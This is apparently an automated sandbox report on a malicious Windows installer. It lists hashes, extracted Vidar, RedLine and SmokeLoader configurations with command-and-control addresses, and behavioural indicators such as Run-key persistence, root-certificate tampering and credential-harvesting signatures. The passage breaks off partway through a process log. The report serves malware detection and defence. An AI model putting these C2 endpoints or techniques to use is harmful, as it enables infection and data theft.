Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
58s -
max time network
1805s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
12-09-2021 07:11
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
3.5MB
-
MD5
1b5154bc65145adba0a58e964265d5f2
-
SHA1
5a96fd55be61222b3e6438712979dc2a18a50b8c
-
SHA256
c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19
-
SHA512
9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
redline
pab123
45.14.49.169:22411
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2320 2228 rundll32.exe 57 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1904 2228 rundll32.exe 57 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3932 2228 rundll32.exe 57 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/748-201-0x00000000003E0000-0x00000000003FF000-memory.dmp family_redline behavioral3/memory/748-207-0x0000000004630000-0x000000000464E000-memory.dmp family_redline behavioral3/memory/1616-327-0x000000000041C5EE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 5 IoCs
resource yara_rule behavioral3/files/0x00030000000130da-108.dat family_socelars behavioral3/files/0x00030000000130da-144.dat family_socelars behavioral3/files/0x00030000000130da-148.dat family_socelars behavioral3/files/0x00030000000130da-155.dat family_socelars behavioral3/files/0x00030000000130da-156.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral3/memory/1396-193-0x0000000003200000-0x00000000032D1000-memory.dmp family_vidar behavioral3/memory/1396-194-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar -
resource yara_rule behavioral3/files/0x00030000000130cd-76.dat aspack_v212_v242 behavioral3/files/0x00030000000130cd-77.dat aspack_v212_v242 behavioral3/files/0x00040000000130c8-78.dat aspack_v212_v242 behavioral3/files/0x00040000000130c8-79.dat aspack_v212_v242 behavioral3/files/0x00030000000130cf-83.dat aspack_v212_v242 behavioral3/files/0x00030000000130cf-82.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 24 IoCs
pid Process 1308 setup_installer.exe 656 setup_install.exe 1396 Sun05ac1b0207d3ff3b8.exe 748 Sun052bbd8bebd9.exe 1952 Sun05532f7abc.exe 1836 Sun05d60bc3b96248e5.exe 1328 Sun05fa3b4d2ae56e.exe 816 Sun05640630a6aa.exe 1596 Sun050462125c7d35.exe 108 Sun054fe19a12cb3.exe 1400 Sun059375dac544fc4a.exe 944 Sun05899db881f67fb29.exe 1300 Sun054fe19a12cb3.tmp 2360 395792.exe 2444 3530382.exe 2492 46807GHF____.exe 2588 5964056.exe 2608 WinHoster.exe 1036 LzmwAqmV.exe 2396 Chrome 5.exe 2116 PublicDwlBrowser1100.exe 2564 2.exe 860 setup.exe 2688 5639685.exe -
Loads dropped DLL 64 IoCs
pid Process 1828 setup_x86_x64_install.exe 1308 setup_installer.exe 1308 setup_installer.exe 1308 setup_installer.exe 1308 setup_installer.exe 1308 setup_installer.exe 1308 setup_installer.exe 656 setup_install.exe 656 setup_install.exe 656 setup_install.exe 656 setup_install.exe 656 setup_install.exe 656 setup_install.exe 656 setup_install.exe 656 setup_install.exe 1772 cmd.exe 1876 cmd.exe 1772 cmd.exe 1876 cmd.exe 1696 cmd.exe 1696 cmd.exe 1016 cmd.exe 1748 cmd.exe 1052 cmd.exe 1052 cmd.exe 1572 cmd.exe 1836 Sun05d60bc3b96248e5.exe 1836 Sun05d60bc3b96248e5.exe 1700 cmd.exe 1668 cmd.exe 380 cmd.exe 1328 Sun05fa3b4d2ae56e.exe 1328 Sun05fa3b4d2ae56e.exe 816 Sun05640630a6aa.exe 816 Sun05640630a6aa.exe 108 Sun054fe19a12cb3.exe 108 Sun054fe19a12cb3.exe 1396 Sun05ac1b0207d3ff3b8.exe 1396 Sun05ac1b0207d3ff3b8.exe 1952 Sun05532f7abc.exe 1952 Sun05532f7abc.exe 748 Sun052bbd8bebd9.exe 748 Sun052bbd8bebd9.exe 108 Sun054fe19a12cb3.exe 1300 Sun054fe19a12cb3.tmp 1300 Sun054fe19a12cb3.tmp 1300 Sun054fe19a12cb3.tmp 2332 rundll32.exe 2332 rundll32.exe 2332 rundll32.exe 2332 rundll32.exe 2444 3530382.exe 2444 3530382.exe 1300 Sun054fe19a12cb3.tmp 2444 3530382.exe 2588 5964056.exe 2588 5964056.exe 2608 WinHoster.exe 2608 WinHoster.exe 2804 WerFault.exe 2804 WerFault.exe 2804 WerFault.exe 2804 WerFault.exe 1036 LzmwAqmV.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3824 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3530382.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 48 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1275 ipinfo.io 900 ipinfo.io 986 ipinfo.io 1148 ipinfo.io 1276 ipinfo.io 1389 ipinfo.io 1392 ipinfo.io 577 ipinfo.io 758 ipinfo.io 2523 api.2ip.ua 1999 ipinfo.io 2157 ipinfo.io 901 ipinfo.io 985 ipinfo.io 1201 ipinfo.io 1391 ipinfo.io 190 api.2ip.ua 665 ipinfo.io 1763 ipinfo.io 666 ipinfo.io 1147 ipinfo.io 1586 ipinfo.io 2000 ipinfo.io 2088 ipinfo.io 783 ipinfo.io 1200 ipinfo.io 542 ipinfo.io 1614 ipinfo.io 2156 ipinfo.io 189 api.2ip.ua 487 ipinfo.io 488 ipinfo.io 541 ipinfo.io 578 ipinfo.io 1740 ipinfo.io 2522 api.2ip.ua 12 ip-api.com 214 api.2ip.ua 1390 ipinfo.io 1587 ipinfo.io 1613 ipinfo.io 1739 ipinfo.io 1760 ipinfo.io 2089 ipinfo.io 759 ipinfo.io 784 ipinfo.io 2283 ipinfo.io 2284 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 2804 1396 WerFault.exe 41 1540 2588 WerFault.exe 66 1592 2360 WerFault.exe 60 1400 2156 WerFault.exe 83 1608 2564 WerFault.exe 75 3328 2688 WerFault.exe 82 3432 1204 WerFault.exe 88 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun05532f7abc.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 972 schtasks.exe 2104 schtasks.exe 3408 schtasks.exe 3280 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3576 timeout.exe 2040 timeout.exe 2600 timeout.exe -
Kills process with taskkill 9 IoCs
pid Process 2556 taskkill.exe 2512 taskkill.exe 2768 taskkill.exe 3232 taskkill.exe 3680 taskkill.exe 2780 taskkill.exe 3992 taskkill.exe 3976 taskkill.exe 2480 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 395792.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun050462125c7d35.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Sun050462125c7d35.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun05d60bc3b96248e5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 395792.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 395792.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun05d60bc3b96248e5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun050462125c7d35.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Sun050462125c7d35.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1952 Sun05532f7abc.exe 1952 Sun05532f7abc.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1516 powershell.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1952 Sun05532f7abc.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 1596 Sun050462125c7d35.exe Token: SeDebugPrivilege 2360 395792.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 2556 taskkill.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeDebugPrivilege 2588 5964056.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 2804 WerFault.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeDebugPrivilege 748 Sun052bbd8bebd9.exe Token: SeDebugPrivilege 1400 WerFault.exe Token: SeDebugPrivilege 2116 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 1592 WerFault.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1208 Process not Found 1208 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1828 wrote to memory of 1308 1828 setup_x86_x64_install.exe 26 PID 1828 wrote to memory of 1308 1828 setup_x86_x64_install.exe 26 PID 1828 wrote to memory of 1308 1828 setup_x86_x64_install.exe 26 PID 1828 wrote to memory of 1308 1828 setup_x86_x64_install.exe 26 PID 1828 wrote to memory of 1308 1828 setup_x86_x64_install.exe 26 PID 1828 wrote to memory of 1308 1828 setup_x86_x64_install.exe 26 PID 1828 wrote to memory of 1308 1828 setup_x86_x64_install.exe 26 PID 1308 wrote to memory of 656 1308 setup_installer.exe 27 PID 1308 wrote to memory of 656 1308 setup_installer.exe 27 PID 1308 wrote to memory of 656 1308 setup_installer.exe 27 PID 1308 wrote to memory of 656 1308 setup_installer.exe 27 PID 1308 wrote to memory of 656 1308 setup_installer.exe 27 PID 1308 wrote to memory of 656 1308 setup_installer.exe 27 PID 1308 wrote to memory of 656 1308 setup_installer.exe 27 PID 656 wrote to memory of 1724 656 setup_install.exe 29 PID 656 wrote to memory of 1724 656 setup_install.exe 29 PID 656 wrote to memory of 1724 656 setup_install.exe 29 PID 656 wrote to memory of 1724 656 setup_install.exe 29 PID 656 wrote to memory of 1724 656 setup_install.exe 29 PID 656 wrote to memory of 1724 656 setup_install.exe 29 PID 656 wrote to memory of 1724 656 setup_install.exe 29 PID 656 wrote to memory of 1772 656 setup_install.exe 31 PID 656 wrote to memory of 1772 656 setup_install.exe 31 PID 656 wrote to memory of 1772 656 setup_install.exe 31 PID 656 wrote to memory of 1772 656 setup_install.exe 31 PID 656 wrote to memory of 1772 656 setup_install.exe 31 PID 656 wrote to memory of 1772 656 setup_install.exe 31 PID 656 wrote to memory of 1772 656 setup_install.exe 31 PID 656 wrote to memory of 1876 656 setup_install.exe 30 PID 656 wrote to memory of 1876 656 setup_install.exe 30 PID 656 wrote to memory of 1876 656 setup_install.exe 30 PID 656 wrote to memory of 1876 656 setup_install.exe 30 PID 656 wrote to memory of 1876 656 